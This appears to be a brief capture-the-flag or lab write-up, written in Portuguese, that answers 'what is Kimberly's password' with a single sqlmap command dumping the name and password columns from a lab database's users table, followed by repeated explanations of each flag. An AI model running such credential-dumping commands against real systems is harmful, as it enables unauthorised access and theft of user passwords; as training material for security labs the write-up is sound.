Qual é a senha do usuário Kimberly? (Caso 1)
Payload :
sqlmap http://94.237.59.129:31261/case1.php\?id\=1 --batch -D testdb --dump -T users -C name,password
--batch: Runs SQLMap in non-interactive mode.
--batch
-D testdb: Specifies the database (testdb) to target.
-D testdb
testdb
--dump: Dumps the contents of the specified database and table.
--dump
-T users: Targets the users table.
-T users
users
-C name,password: Specifies the columns name and password to retrieve from the users table.
-C name,password
name
password
Last updated 1 year ago